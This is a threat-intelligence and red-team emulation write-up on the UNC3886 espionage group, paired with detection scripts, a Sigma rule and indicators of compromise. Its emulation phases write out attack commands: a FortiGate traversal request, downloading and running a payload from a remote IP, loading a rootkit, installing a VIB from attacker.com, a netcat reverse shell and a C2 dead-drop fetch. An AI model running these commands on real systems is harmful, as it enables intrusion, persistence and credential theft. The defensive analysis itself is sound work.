Top Cyber Threats in 2025: Tracking APT Groups Like UNC3886

A Realistic Adversary Simulation Based on Mandiant & Google Cloud's Findings

📌 Who is UNC3886?

UNC3886 is a suspected Chinese state-sponsored cyber espionage group uncovered by Mandiant and Google Cloud. The actor specializes in stealthy, long-term compromise of high-value network infrastructure, including:

  • Fortinet FortiGate firewalls (CVE-2022-41328)
  • Juniper JunOS routers (CVE-2025-21590)
  • VMware ESXi hypervisors (CVE-2023-20867)
  • vCenter servers and TACACS+ authentication systems

UNC3886 uses zero-day exploits, custom malware (CASTLETAP, RIFLESPINE, VIRTUALPIE), rootkits (REPTILE, MEDUSA), and dead-drop C2 to maintain persistent access while evading detection.

Tags: APT Group, Espionage, Zero-Day Exploitation, VMware ESXi, Fortinet, Juniper, Google Drive C2, Rootkit

🛠️ MITRE ATT&CK Mapping

Techniques grouped by tactic (ATT&CK ID, then how UNC3886 applies it):

Resource Development
  • T1583.003: Use VPS from Alibaba, Vultr, HKBN, Ucloud
  • T1584.008: Target FortiGate, Juniper, vCenter devices
  • T1587.003: Create TLS certificates mimicking victim org
  • T1587.004: Develop exploits for VMware/Fortinet zero-days

Initial Access
  • T1190: Exploit CVE-2022-41328 (Fortinet), CVE-2025-21590 (Juniper)
  • T1078: Use valid credentials via SSH/TACACS+
  • T1133: Access remote services (VPN, SSH)

Execution
  • T1059.001: PowerShell: MiniDump LSASS memory
  • T1059.003: Windows Command Shell via RIFLESPINE
  • T1059.004: Unix Shell (bash/csh) via TINYSHELL
  • T1059.006: Python scripts (VIRTUALPIE, pall.py)
  • T1129: Shared modules (VMCI interface)
  • T1675: ESXi Guest Operations API abuse
  • T1218.011: rundll32.exe + comsvcs.dll → LSASS dump

Persistence
  • T1037.004: Modify /etc/init.d/localnet to run /bin/support
  • T1505.006: Deploy malicious VIBs on ESXi (VIRTUALPITA/VIRTUALPIE)
  • T1543.002: Symlink /bin/sysctl → backdoored lspci
  • T1554: Backdoor SSH/tac_plus daemons to log credentials
  • T1098: Exploit CVE-2023-20867 to disable guest auth checks

Defense Evasion
  • T1014: Deploy REPTILE/MEDUSA rootkits
  • T1027.013: Base64 encode payload (ldb.b64)
  • T1027.015: Compress payload into trace logs
  • T1055: Process injection into cat (CVE-2025-21590)
  • T1070.006: Timestomp VIB installation time
  • T1140: XOR decode ICMP activation string daily
  • T1562.001: Disable signature checks via smit patch
  • T1564: Hide REPTILE process/files using LKM
  • T1572: TLS tunneling with stolen certs
  • T1573.001: RC4/AES/ChaCha20 encrypted traffic

Credential Access
  • T1003.001: Dump LSASS memory via rundll32
  • T1040: Sniff TACACS+ with LOOKOVER
  • T1056.001: Keylogging via MEDUSA
  • T1555: Steal vpxuser creds from vPostgreSQL

Lateral Movement
  • T1021.004: SSH from FortiGate to ESXi
  • T1563.001: SSH session hijacking via MEDUSA

Command & Control
  • T1102: Google Drive C2 (RIFLESPINE)
  • T1102.001: Dead drop resolver (cyberponke.github.io)
  • T1090: SOCKS proxy via TINYSHELL appid
  • T1205.001: ICMP port knocking (CASTLETAP)
  • T1573.001: Symmetric encryption (AES/RC4/ChaCha20)
  • T1572: Protocol tunneling with TLS

Collection
  • T1005: Collect data from local system
  • T1074.001: Stage data using makecab
  • T1560.001: Archive via utility (ZIP, CAB)

Impact
  • T1491: Defacement simulation

🔴 Realistic Red Team Emulation Plan

🎯 Phase 1: Resource Development

Set up infrastructure mimicking UNC3886's C2 setup.

# Acquire VPS from Alibaba/Vultr (Singapore/HK)
ssh root@vps-alibaba-sg

# Deploy dead-drop resolver
git clone https://github.com/cyberponke/config.git /var/www/html/
echo "185.199.108.153 c2-drops.net" > config/index.txt

🔓 Phase 2: Initial Access

Exploit CVE-2022-41328 on FortiGate.

POST /remote/fgt_lang?lang=/../../../..//////////bin/ps HTTP/1.1
Host: firewall.corp.com:443

# Download payload
tftp -g -r /malicious.bin -l /bin/fgfm 47.252.20.90
chmod +x /bin/fgfm && nohup /bin/fgfm &

🛡️ Phase 3: Defense Evasion

Deploy REPTILE with TLS and hide artifacts.

# Load kernel module with TLS
insmod reptile.ko pass=secret port=1337 ssl=1 cert=/etc/cert.pem key=/etc/key.pem

# Hide process and file
echo "hide_process REPTILE.SHELL" > /proc/reptile/cmd
echo "hide_file /bin/fgfm" >> /proc/reptile/cmd

🔐 Phase 4: Persistence & Privilege Escalation

Install malicious VIB on ESXi.

# Bypass signature check
esxcli software acceptance set --level=PartnerSupported

# Install VIB
esxcli software vib install -f --no-sig-check -v http://attacker.com/VIRTUALPITA.vib

# Exploit CVE-2023-20867 via pall.py
python3 pall.py --target 10.1.1.100 --cmd "nc attacker_ip 4444 -e /bin/sh"

🔁 Phase 5: Lateral Movement

Movement via SSH and credential reuse.

# Pivot from FortiGate to ESXi
ssh root@esxi-host -J admin@fortigate

# Use stolen vpxuser to access VMs
vim-cmd vmsvc/getallvms

📡 Phase 6: Command & Control

Use Google Drive and dead drops.

# RIFLESPINE-like Google Drive polling
python3 -c "
import drive; task = drive.get('task.enc'); cmd = decrypt(task); output = run(cmd); drive.upload('resp.enc', encrypt(output))
"

# Dead drop resolver (MOPSLED)
curl https://cyberponke.github.io/config | chacha20-decrypt key > c2.txt

📦 Phase 7: Collection & Exfiltration

Stage and compress data.

# Stage files
copy C:\Users\*.kdbx C:\Staging\

# Compress using Windows tool
makecab /F files.inf archive.cab

💥 Phase 8: Impact Simulation

Simulate defacement (non-destructive).

echo "System Under Maintenance" > /var/www/html/index.html

🚨 Indicators of Compromise (IOCs)

File Paths:
/bin/fgfm, /var/tmp/.castletap, /etc/init.d/localnet,
/var/log/tacucs.log, /lib/modules/*/reptile.ko,
/var/log/ldapd*.gz, /usr/sbin/auditd*

Network Artifacts:
POST /remote/fgt_lang?lang=..., GET cyberponke.github.io/config,
UDP/TCP on ports 2233, 1337, 22000+

C2 Domains/IPs:
cyberponke.github.io, secure-update.net, 47.252.20.90

Malware Signatures:
CASTLETAP (ICMP magic: "CASTLETA"), RIFLESPINE (Google Drive sync),
VIRTUALPIE (Python-based ESXi backdoor), REPTILE (LKM rootkit)

🔍 Detection & Hunting Recommendations

  • Monitor for rundll32.exe C:\windows\System32\comsvcs.dll MiniDump
  • Detect unexpected VIB installations on ESXi hosts
  • Alert on Base64-encoded files written to Juniper shell (ldb.b64)
  • Inspect ICMP packets for XOR-encoded strings (daily rotating key)
  • Log modifications to /etc/init.d/ and systemd units
  • Baseline SSH activity and flag session hijacking patterns
  • Hunt for processes loading unknown kernel modules (insmod reptile.ko)
  • Check for modified /bin/smit or tac_plus binaries
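
To make the "unexpected VIB installations" and timestomping items above concrete, here is an added Python example (not code from the original post, nor from Mandiant or Google Cloud) that parses `esxcli software vib list` output and flags VIBs for analyst review: vendor strings outside an allowlist, VMware-branded VIBs that are not VMwareCertified, CommunitySupported VIBs, and install dates that predate every VMware-shipped VIB or lie in the future. The sample output, the column set, the trusted-vendor allowlist and the date heuristic are all constructed assumptions that a team would tune to its own image profile.

```python
"""
Added example, not code from the original post or from Mandiant/Google Cloud:
a hunt over `esxcli software vib list` output that flags VIBs worth review.
The sample output is constructed; the column set, the trusted-vendor set and
the base-image date heuristic are assumptions to tune per fleet.
"""
from datetime import date

# Constructed sample output (not captured from a real host). The last entry
# is the suspicious one: a vendor string that only looks like VMware's and an
# install date older than the base image, consistent with the timestomping
# the write-up maps to T1070.006.
SAMPLE_VIB_LIST = """\
Name                Version                         Vendor  Acceptance Level  Install Date
------------------  ------------------------------  ------  ----------------  ------------
esx-base            8.0.2-0.0.22380479              VMware  VMwareCertified   2024-03-11
esx-ui              2.14.0-21993070                 VMware  VMwareCertified   2024-03-11
net-bnxtnet         226.0.142.0-1vmw.802.0.0.22380  VMW     VMwareCertified   2024-03-11
tools-light         12.3.5.22544099-22380479        VMware  VMwareCertified   2024-03-11
hpe-smx-provider    2.0.0-1OEM.800.1.0.20613240     HPE     PartnerSupported  2024-03-12
vmware-esxio-tools  1.0-1                           VMWARE  PartnerSupported  2019-06-02
"""

COLUMNS = ("Name", "Version", "Vendor", "Acceptance Level", "Install Date")
TRUSTED_VENDORS = {"VMW", "VMware", "HPE"}   # assumption: allowlist per fleet
VMWARE_VENDORS = ("VMW", "VMware")           # exact vendor strings VMware ships

def parse_vib_list(text):
    """Parse the whitespace-separated rows of `esxcli software vib list`.
    Header and dashed separator are skipped; none of the five columns
    contains spaces in esxcli output, so a plain split() is enough.
    (Newer ESXi releases may add columns; adjust COLUMNS accordingly.)"""
    vibs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != len(COLUMNS) or set(parts[0]) == {"-"}:
            continue
        vibs.append(dict(zip(COLUMNS, parts)))
    return vibs

def hunt_vibs(vibs, today=None):
    """Return (name, reason) pairs for VIBs that deserve analyst review."""
    today = today or date.today()
    findings = []
    base_dates = [date.fromisoformat(v["Install Date"]) for v in vibs
                  if v["Vendor"] in VMWARE_VENDORS]
    oldest_base = min(base_dates) if base_dates else None
    for v in vibs:
        name, vendor, level = v["Name"], v["Vendor"], v["Acceptance Level"]
        installed = date.fromisoformat(v["Install Date"])
        # Exact-case allowlist: a lookalike such as 'VMWARE' must not pass.
        if vendor not in TRUSTED_VENDORS:
            findings.append((name, f"untrusted vendor string {vendor!r}"))
        if level == "CommunitySupported":
            findings.append((name, "CommunitySupported acceptance level"))
        # Anything VMware-branded that is not VMwareCertified is out of place.
        if vendor.lower().startswith("vmw") and level != "VMwareCertified":
            findings.append((name, f"VMware-branded VIB at level {level}"))
        # Install dates older than every VMware VIB, or in the future, point
        # at a timestomped installation rather than a real base-image install.
        if oldest_base and installed < oldest_base:
            findings.append((name, f"install date {installed} predates base image {oldest_base}"))
        if installed > today:
            findings.append((name, f"install date {installed} is in the future"))
    return findings

def run_hunt(text, today_iso=None):
    """Convenience wrapper: parse esxcli output and hunt in one call."""
    today = date.fromisoformat(today_iso) if today_iso else None
    return hunt_vibs(parse_vib_list(text), today)

if __name__ == "__main__":
    for name, reason in run_hunt(SAMPLE_VIB_LIST, "2025-04-05"):
        print(f"{name}: {reason}")
```

Feed it the saved output of `esxcli software vib list` from each host separately: the "predates base image" heuristic is relative to that host's own VMware VIB dates, so results are not comparable across hosts imaged on different days.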

Example Sigma Rule (YAML)

title: Suspicious rundll32 LSASS Dump
id: 9a3b5c1e-1234-4abc-9876-abcdef123456
status: experimental
description: Detects rundll32.exe abusing the comsvcs.dll MiniDump export to dump LSASS memory
author: RedTeam Lab
date: 2025/04/05
tags:
    - attack.credential_access
    - attack.t1003.001
    - attack.defense_evasion
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\rundll32.exe'
        # A plain 'contains' list is OR-ed, so a path value on its own would
        # fire on benign rundll32 runs; 'contains|all' requires both substrings
        # and still matches the 'comsvcs.dll, MiniDump' spelling with a comma.
        CommandLine|contains|all:
            - 'comsvcs'
            - 'MiniDump'
    condition: selection
falsepositives:
    - Unlikely; legitimate use of the comsvcs.dll MiniDump export is rare
level: high

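To see how a Sigma selection behaves against real-looking telemetry, here is an added Python example (not code from the original post): a minimal evaluator for Sigma's `endswith`, `contains` and `contains|all` modifiers, run over a few constructed Windows process-creation events. It compares a loose selection (a `contains` list, which Sigma OR-s, with a `C:\windows\Temp` path value) against the tightened `contains|all` form with `comsvcs` and `MiniDump`, and shows that the loose one fires on a benign rundll32 run while the tight one catches the `comsvcs.dll, MiniDump` spelling with a comma. The events are constructed for the example; the field names follow Sigma's process_creation taxonomy.

```python
"""
Added example (not from the original post): evaluate Sigma-style selections
against constructed process_creation events. Matching is case-insensitive,
as Sigma specifies for string fields.
"""

# Constructed sample events (not real telemetry). Field names follow the
# Sigma process_creation taxonomy (Image, CommandLine).
EVENTS = [
    # LSASS dump through the comsvcs.dll MiniDump export (comma spelling)
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\windows\Temp\lsass.dmp full"},
    # Benign installer helper DLL that happens to live under Temp
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\windows\Temp\setup.dll,InstallHelper"},
    # Ordinary control-panel launch
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    # Same strings on the command line, but not rundll32
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c echo comsvcs.dll MiniDump"},
]

def _values(v):
    return v if isinstance(v, list) else [v]

def match_selection(event, selection):
    """Evaluate one Sigma selection (AND of its field conditions) against
    one event. Supports the 'endswith', 'contains' and 'contains|all'
    modifiers plus plain equality, all case-insensitively."""
    for key, expected in selection.items():
        field, _, mods = key.partition("|")
        actual = str(event.get(field, "")).lower()
        vals = [str(v).lower() for v in _values(expected)]
        if mods == "endswith":
            ok = any(actual.endswith(v) for v in vals)
        elif mods == "contains":
            ok = any(v in actual for v in vals)   # list values are OR-ed
        elif mods == "contains|all":
            ok = all(v in actual for v in vals)   # every value must be present
        elif mods == "":
            ok = any(actual == v for v in vals)
        else:
            raise ValueError(f"unsupported modifier: {mods}")
        if not ok:
            return False
    return True

# Loose selection: the Temp path is OR-ed in, so it fires on its own, and the
# space-separated 'comsvcs.dll MiniDump' misses the comma spelling.
LOOSE_SELECTION = {
    "Image|endswith": r"\rundll32.exe",
    "CommandLine|contains": ["comsvcs.dll MiniDump", r"C:\windows\Temp"],
}

# Tight selection: both substrings must appear on the command line.
TIGHT_SELECTION = {
    "Image|endswith": r"\rundll32.exe",
    "CommandLine|contains|all": ["comsvcs", "MiniDump"],
}

def hits(selection, events=EVENTS):
    """Return the indices of the events the selection fires on."""
    return [i for i, e in enumerate(events) if match_selection(e, selection)]

if __name__ == "__main__":
    print("loose:", hits(LOOSE_SELECTION))   # includes the benign Temp DLL
    print("tight:", hits(TIGHT_SELECTION))   # only the LSASS dump
```

The evaluator covers only the modifiers the rule needs; for production use, compile rules with the Sigma tooling for your SIEM rather than hand-evaluating them, but a small harness like this is a quick way to check a selection's OR/AND semantics against sample events before shipping it.
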
📚 References

Note: This document is for educational and red team training purposes only. All activities must be authorized under strict rules of engagement.
© 2025 Threat Intelligence & Red Team Lab
Based on public reporting from Mandiant and Google Cloud.
Do not use without proper authorization.
